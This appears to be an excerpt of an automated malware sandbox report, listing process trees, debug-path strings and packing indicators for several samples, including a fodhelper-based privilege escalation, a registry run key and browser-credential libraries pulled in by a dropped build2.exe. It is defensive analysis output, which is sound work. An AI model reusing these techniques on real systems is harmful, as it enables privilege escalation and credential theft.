Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe"
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Users\user\AppData\Local\Temp\71C9.exe "C:\Users\user\AppData\Local\Temp\71C9.exe"
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 6uVlPQSJ4e.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: build2.exe, 00000029.00000002.3578472192.000000006C48D000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: Loader.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: YC:\kowad\hur_xez bejuwud_nucasa25 nima49\ler.pdb source: 6uVlPQSJ4e.exe, 00000000.00000000.2055147362.0000000000410000.00000002.00000001.01000000.00000003.sdmp, 6uVlPQSJ4e.exe, 00000000.00000002.2119831662.0000000000410000.00000002.00000001.01000000.00000003.sdmp, gtdirat, 00000006.00000000.2306948780.0000000000410000.00000002.00000001.01000000.00000005.sdmp, gtdirat, 00000006.00000002.2358003231.0000000000410000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: nss3.pdb@ source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: EfiGuardDxe.pdb7 source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp
Source: Binary string: C:\kowad\hur_xez bejuwud_nucasa25 nima49\ler.pdb source: 6uVlPQSJ4e.exe, 00000000.00000000.2055147362.0000000000410000.00000002.00000001.01000000.00000003.sdmp, 6uVlPQSJ4e.exe, 00000000.00000002.2119831662.0000000000410000.00000002.00000001.01000000.00000003.sdmp, gtdirat, 00000006.00000000.2306948780.0000000000410000.00000002.00000001.01000000.00000005.sdmp, gtdirat, 00000006.00000002.2358003231.0000000000410000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdb source: 71C9.exe, 0000001D.00000002.3185463938.0000000003A09000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: !?C:\fub15\jekofesero\faduporixe_yaf.pdb source: DB15.exe, 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000B.00000000.2817926575.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000C.00000000.2819249973.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000010.00000002.2841208220.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000010.00000000.2836193602.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000011.00000000.2839475530.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000012.00000002.2842579793.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000012.00000000.2839477285.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000013.00000000.2840959577.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000015.00000000.2960769899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000015.00000002.2966350391.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000016.00000000.2964684710.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000002.3049973246.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000000.3044970773.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001C.00000000.3046708932.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: mozglue.pdb source: build2.exe, 00000029.00000002.3578472192.000000006C48D000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: C:\bap\xipuvi-g.pdb source: 71C9.exe, 0000001D.00000000.3076477137.0000000000410000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: DB15.exe, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: .pdb.dbg source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: 71C9.exe, 0000001D.00000003.3083456233.000000000414B000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdbGCTL source: 71C9.exe, 0000001D.00000002.3185463938.0000000003A09000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000002B.00000002.3312441020.0000000000401000.00000020.00000001.01000000.00000017.sdmp, build3.exe, 0000002B.00000000.3160354253.0000000000401000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: 6C:\bap\xipuvi-g.pdb source: 71C9.exe, 0000001D.00000000.3076477137.0000000000410000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: 71C9.exe, 0000001D.00000003.3083456233.000000000414B000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: DB15.exe, 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\fub15\jekofesero\faduporixe_yaf.pdb source: DB15.exe, 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000B.00000000.2817926575.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000C.00000000.2819249973.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000010.00000002.2841208220.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000010.00000000.2836193602.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000011.00000000.2839475530.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000012.00000002.2842579793.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000012.00000000.2839477285.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000013.00000000.2840959577.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000015.00000000.2960769899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000015.00000002.2966350391.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000016.00000000.2964684710.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000002.3049973246.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000000.3044970773.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001C.00000000.3046708932.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: dbghelp.pdbGCTL source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000002B.00000002.3312441020.0000000000401000.00000020.00000001.01000000.00000017.sdmp, build3.exe, 0000002B.00000000.3160354253.0000000000401000.00000020.00000001.01000000.00000017.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Unpacked PE file: 0.2.6uVlPQSJ4e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\gtdirat Unpacked PE file: 6.2.gtdirat.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Unpacked PE file: 12.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 17.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Unpacked PE file: 19.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 22.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 28.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Unpacked PE file: 29.2.71C9.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Unpacked PE file: 41.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Unpacked PE file: 44.2.71C9.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Unpacked PE file: 12.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 17.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Unpacked PE file: 19.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 22.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Unpacked PE file: 28.2.DB15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Unpacked PE file: 29.2.71C9.exe.400000.5.unpack
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Unpacked PE file: 41.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Unpacked PE file: 44.2.71C9.exe.400000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 12_2_00412220
Source: initial sample Static PE information: section where entry point is pointing to: .vmp{
Source: 71C9.exe.2.dr Static PE information: real checksum: 0x432b23 should be: 0x425aee
Source: sqlm[1].dll.41.dr Static PE information: real checksum: 0x0 should be: 0x263795
Source: A0B.exe.2.dr Static PE information: section name: .vmp
Source: A0B.exe.2.dr Static PE information: section name: .vmp
Source: A0B.exe.2.dr Static PE information: section name: .vmp{
Source: A0B.exe.2.dr Static PE information: section name: .vmp{
Source: A0B.exe.2.dr Static PE information: section name: .vmp{
Source: build3.exe.19.dr Static PE information: section name: .kic
Source: build3[1].exe.19.dr Static PE information: section name: .kic
Source: sqlm[1].dll.41.dr Static PE information: section name: .00cfg
Source: freebl3.dll.41.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.41.dr Static PE information: section name: .00cfg
Source: mozglue.dll.41.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.41.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.41.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.41.dr Static PE information: section name: .didat
Source: nss3.dll.41.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.41.dr Static PE information: section name: .00cfg
Source: softokn3.dll.41.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.41.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004026D2 push ebx; ret 0_2_004026EA
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004026ED pushad ; ret 0_2_004026F4
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004026F7 push ebx; ret 0_2_00402714
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00402745 push edi; ret 0_2_0040276D
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_0040273B push edi; ret 0_2_00402742
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00402595 push ss; ret 0_2_0040259C
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004027BB push edi; ret 0_2_0040276D
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C22822 push edi; ret 0_2_00C227D4
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C225FC push ss; ret 0_2_00C22603
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C227A2 push edi; ret 0_2_00C227A9
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C215A4 push AFD66869h; ret 0_2_00C215A9
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C227AC push edi; ret 0_2_00C227D4
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C22754 pushad ; ret 0_2_00C2275B
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C2275E push ebx; ret 0_2_00C2277B
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C22739 push ebx; ret 0_2_00C22751
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D288F0 pushad ; iretd 0_2_00D288F1
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D2DE93 push eax; iretd 0_2_00D2DE94
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D2E077 push ds; retf 0_2_00D2E079
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D2E07B push esi; iretd 0_2_00D2E07D
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D277E3 push AFD66869h; ret 0_2_00D277E8
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D289B2 push D23524A7h; retn 0006h 0_2_00D289BA
